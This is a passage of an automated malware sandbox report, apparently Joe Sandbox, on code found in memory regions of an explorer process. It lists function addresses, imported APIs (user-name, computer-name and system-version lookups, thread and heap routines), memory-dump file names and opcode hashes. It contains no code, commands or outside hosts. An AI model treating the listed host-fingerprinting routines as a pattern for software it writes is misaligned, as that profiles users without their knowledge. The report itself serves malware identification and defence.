                                                                                                                                                                                                                                                    • Opcode ID: 9ee94f24616c3bc1f4c948cfa2b9c388dded86d6c9ce121c8cf051fea961840d
                                                                                                                                                                                                                                                    • Instruction ID: 6fbffeebe8d03b9f2f6d509a9ef98f4dc7b59de1347a0182c401a360b19d5757
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ee94f24616c3bc1f4c948cfa2b9c388dded86d6c9ce121c8cf051fea961840d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F418232714A80DAE720DF71E8443DE77A4FB8878CF844115EA8D47AA8EFB8C245CB50
                                                                                                                                                                                                                                                    Function 0F4B4B50 Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32 ref: 0F4B4C09
                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32 ref: 0F4B4C23
                                                                                                                                                                                                                                                      • Part of subcall function 0F4AEA80: WideCharToMultiByte.KERNEL32 ref: 0F4AEAC3
                                                                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32 ref: 0F4B4C4C
                                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32 ref: 0F4B4C5D
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0F4B4CA3
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: EnterCriticalSection.KERNEL32 ref: 0F4A88D8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: RtlInitializeCriticalSection.NTDLL ref: 0F4A88E5
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcpyA.KERNEL32 ref: 0F4A891A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcpyA.KERNEL32 ref: 0F4A893D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcatA.KERNEL32 ref: 0F4A894D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcatA.KERNEL32 ref: 0F4A895D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: LeaveCriticalSection.KERNEL32 ref: 0F4A89E4
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: memcpy.MSVCRT ref: 0F4A89FC
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrlenA.KERNEL32 ref: 0F4A8A0A
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0F4B4CB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2800961625-0
                                                                                                                                                                                                                                                    • Opcode ID: 9ee94f24616c3bc1f4c948cfa2b9c388dded86d6c9ce121c8cf051fea961840d
                                                                                                                                                                                                                                                    • Instruction ID: 458b948d80e89b8f006ba3318dc887761da91c7c524079a402d939e8f4b6b7a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ee94f24616c3bc1f4c948cfa2b9c388dded86d6c9ce121c8cf051fea961840d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22416232A14B819AD720DF62E8543DE77A4F788788F84411ADA4D47F69EF7CC24ACB40
                                                                                                                                                                                                                                                    Function 10D67CF0 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3234909527-0
                                                                                                                                                                                                                                                    • Opcode ID: 4b9282383034dc6f92657966502109fcf4811ea107f9554322e173f2b13dec5f
                                                                                                                                                                                                                                                    • Instruction ID: 809534edd40539a15b9d17603ea3aa5dbd1166482b39d514178ca9329d2481a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9282383034dc6f92657966502109fcf4811ea107f9554322e173f2b13dec5f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65318F32200B44C7EB10DF65E45436AB3A1FB88BD8F198625DA9947798EF3CC845CF50
                                                                                                                                                                                                                                                    Function 0F4A7CF0 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3234909527-0
                                                                                                                                                                                                                                                    • Opcode ID: 4b9282383034dc6f92657966502109fcf4811ea107f9554322e173f2b13dec5f
                                                                                                                                                                                                                                                    • Instruction ID: e0730e2b4796d7a952b53837000a08bf21561a954471abab1d61fc898ca0b38c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9282383034dc6f92657966502109fcf4811ea107f9554322e173f2b13dec5f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA318F31205B4186EB349F21E45436A73A2F788F98F44832ADE6947B9ADF3DD445CB50
                                                                                                                                                                                                                                                    Function 10D74E60 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3932841890-0
                                                                                                                                                                                                                                                    • Opcode ID: 895406114dc91cd77c544a4b044a7a7dab0b5189570e61adfd51f802e07fd398
                                                                                                                                                                                                                                                    • Instruction ID: 577ee4ce088d671b774655335f28ed32ef40be14feeb964938e381f51f1d1743
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 895406114dc91cd77c544a4b044a7a7dab0b5189570e61adfd51f802e07fd398
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E901813570074182EF08DBA7B95439AA7A1FB8CFD8F089035EE4A07B58DE7CC0918700
                                                                                                                                                                                                                                                    Function 0F4B4E60 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3932841890-0
                                                                                                                                                                                                                                                    • Opcode ID: 895406114dc91cd77c544a4b044a7a7dab0b5189570e61adfd51f802e07fd398
                                                                                                                                                                                                                                                    • Instruction ID: 1b4a40faf3fbeff5db7c5cce65f9ca8aa21b5b5f037c0fff64af7e48782e702c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 895406114dc91cd77c544a4b044a7a7dab0b5189570e61adfd51f802e07fd398
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52016D2570174282EF28DB67B95436AA7A1FB88FD4F0894398D0B07B19DE3CC0559700
                                                                                                                                                                                                                                                    Function 0E904E60 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3932841890-0
                                                                                                                                                                                                                                                    • Opcode ID: a6576f2d62a2635a95e8a2760e57b5e07f9754c725325fe865b7b7394ac864db
                                                                                                                                                                                                                                                    • Instruction ID: 7c6228835a1ef1021bcd191813d6e76dac6e5c9edcd74791dfcf6bbc154a7784
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6576f2d62a2635a95e8a2760e57b5e07f9754c725325fe865b7b7394ac864db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90016D25701B8282EF08DB67F95471AA3A5EB88FD4F0898398E0A17B58DE3CC4518B00
                                                                                                                                                                                                                                                    Function 10D7B89C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2556904055-0
                                                                                                                                                                                                                                                    • Opcode ID: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction ID: 214ec6543c6506b8a291be6aac928dec7c31d2cd2a7996f890f7682972d3b3a7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0A774301B04C5EE18ABE1F8453993350FB94748F848966DA8E07B60CE7CE4E18335
                                                                                                                                                                                                                                                    Function 0F4BB89C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2556904055-0
                                                                                                                                                                                                                                                    • Opcode ID: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction ID: 61cad5aec18fdc03630840135e87319134092425c93085d8551035b3daf7bff9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAF0FE64702B0681EE28ABA2FC543AA3361FB84761F445D2ECD1E17F62DE3CE455A321
                                                                                                                                                                                                                                                    Function 0E90B89C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2556904055-0
                                                                                                                                                                                                                                                    • Opcode ID: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction ID: 585ba75e418bd6533dd962d73d65572e1036dc0a4d17d7280b5458d1826b74fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BF08260301B4999EE68EBA1F8553192360FBC4B80F940C298A0E177A0DE38D5518B01
                                                                                                                                                                                                                                                    Function 0C36DBB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CompareString__crtmalloc
                                                                                                                                                                                                                                                    • String ID: p
                                                                                                                                                                                                                                                    • API String ID: 1736151240-2181537457
                                                                                                                                                                                                                                                    • Opcode ID: bd2f2b6481023ca818008caf96ebc89b748f344efc2213763a59e0148024b26c
                                                                                                                                                                                                                                                    • Instruction ID: 702692c332cbc7d23bbefca185db6a906f8c1341981e8c44d142a7377cc03f54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd2f2b6481023ca818008caf96ebc89b748f344efc2213763a59e0148024b26c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88310E7232578086EB21AF25E4407A97BA5FB84BA8F548322DE1A47FDCDB78C145CF10
                                                                                                                                                                                                                                                    Function 0A03DBB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CompareString__crtmalloc
                                                                                                                                                                                                                                                    • String ID: p
                                                                                                                                                                                                                                                    • API String ID: 1736151240-2181537457
                                                                                                                                                                                                                                                    • Opcode ID: bd2f2b6481023ca818008caf96ebc89b748f344efc2213763a59e0148024b26c
                                                                                                                                                                                                                                                    • Instruction ID: 6d5f5583392156eb93d9ddfeede2c716ed255e995992644b1c6741312547e90f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd2f2b6481023ca818008caf96ebc89b748f344efc2213763a59e0148024b26c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C3103B33247488AEB61AF15E4407A977A9FB857B8F440A26DE1E47BD8DB78C145CB00
                                                                                                                                                                                                                                                    Function 0E8BDBB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CompareString__crtmalloc
                                                                                                                                                                                                                                                    • String ID: p
                                                                                                                                                                                                                                                    • API String ID: 1736151240-2181537457
                                                                                                                                                                                                                                                    • Opcode ID: bd2f2b6481023ca818008caf96ebc89b748f344efc2213763a59e0148024b26c
                                                                                                                                                                                                                                                    • Instruction ID: c42baf6260033a2f6f26e2463850b60080dcdbd734d50291f4ce7947901bfb8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd2f2b6481023ca818008caf96ebc89b748f344efc2213763a59e0148024b26c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C312072314B8096EB219F19E0607E937A5FB857A8F584A22DE5D83BD8EB78C940C310
                                                                                                                                                                                                                                                    Function 10D6E450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                                                    • API String ID: 3001812590-790759568
                                                                                                                                                                                                                                                    • Opcode ID: e01983cd2b0b733af08b76264788c6d56fc0893ebae8703122cb5c001ea97578
                                                                                                                                                                                                                                                    • Instruction ID: 49d729a9d736c5aa9c38f6863d5c1a0e108a74067bc1b2b8dbd423a16a82d532
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e01983cd2b0b733af08b76264788c6d56fc0893ebae8703122cb5c001ea97578
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE3118362187809AD710CFA5F49038BBBA1FBD9344F54141AEBC983A68EB7CC555CB10
                                                                                                                                                                                                                                                    Function 0F4AE450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                                                    • API String ID: 3001812590-790759568
                                                                                                                                                                                                                                                    • Opcode ID: e01983cd2b0b733af08b76264788c6d56fc0893ebae8703122cb5c001ea97578
                                                                                                                                                                                                                                                    • Instruction ID: 1fcd79f5cb8b4fa2b39b530a8dafaf4f30bc0115c237b48f86225d66168fefa5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e01983cd2b0b733af08b76264788c6d56fc0893ebae8703122cb5c001ea97578
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1331183261878096D710CF66F49035BBBA5FB99394F94042AEB8983E29DB7DC559CB00
                                                                                                                                                                                                                                                    Function 10D6CF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 10D6CF62
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10D6CFA8
                                                                                                                                                                                                                                                      • Part of subcall function 10D7B6EC: setlocale.LIBCMT ref: 10D7B700
                                                                                                                                                                                                                                                      • Part of subcall function 10D7B6EC: _Yarn.LIBCPMT ref: 10D7B71A
                                                                                                                                                                                                                                                      • Part of subcall function 10D7B6EC: setlocale.LIBCMT ref: 10D7B729
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 10D6CFC7
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 10D6CFD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 0ddee6e6e79006ef7ab2065b8a88767080c8ad5d23dbbaca5fe2b25dfbed4c79
                                                                                                                                                                                                                                                    • Instruction ID: 7fae855b3f97721b30725f3994636394c14403c992492a8a0a4bd831e2475997
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ddee6e6e79006ef7ab2065b8a88767080c8ad5d23dbbaca5fe2b25dfbed4c79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3F0366671098C92CB14DFE5E9911BCA335EB947D8FC49022A74F475E8EF34D986C360
                                                                                                                                                                                                                                                    Function 0F4ACF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0F4ACF62
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0F4ACFA8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BB6EC: setlocale.LIBCMT ref: 0F4BB700
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BB6EC: _Yarn.LIBCPMT ref: 0F4BB71A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BB6EC: setlocale.LIBCMT ref: 0F4BB729
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0F4ACFC7
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4ACFD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 0ddee6e6e79006ef7ab2065b8a88767080c8ad5d23dbbaca5fe2b25dfbed4c79
                                                                                                                                                                                                                                                    • Instruction ID: 110373451cad5e0979fb12ba4f0bfea4268a4715fdd80ab6ef85bbe165c4faab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ddee6e6e79006ef7ab2065b8a88767080c8ad5d23dbbaca5fe2b25dfbed4c79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59F0FFA2310A4550CB54EB66E9D02BDB325EBB4784FC4802B9F4F46A6AFF2DC946C350
                                                                                                                                                                                                                                                    Function 0E8FCF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0E8FCF62
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E8FCFA8
                                                                                                                                                                                                                                                      • Part of subcall function 0E90B6EC: setlocale.LIBCMT ref: 0E90B700
                                                                                                                                                                                                                                                      • Part of subcall function 0E90B6EC: _Yarn.LIBCPMT ref: 0E90B71A
                                                                                                                                                                                                                                                      • Part of subcall function 0E90B6EC: setlocale.LIBCMT ref: 0E90B729
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0E8FCFC7
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E8FCFD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 409252694-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 0ddee6e6e79006ef7ab2065b8a88767080c8ad5d23dbbaca5fe2b25dfbed4c79
                                                                                                                                                                                                                                                    • Instruction ID: 8edb774f928ee9663619b9f25c9a3f569ccf0142ea94a5348e438405434853fa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ddee6e6e79006ef7ab2065b8a88767080c8ad5d23dbbaca5fe2b25dfbed4c79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2F062A2210949E1CF14EB69D85016CE365EFD47C4FC44822CB0F875A8EF34DE96C755
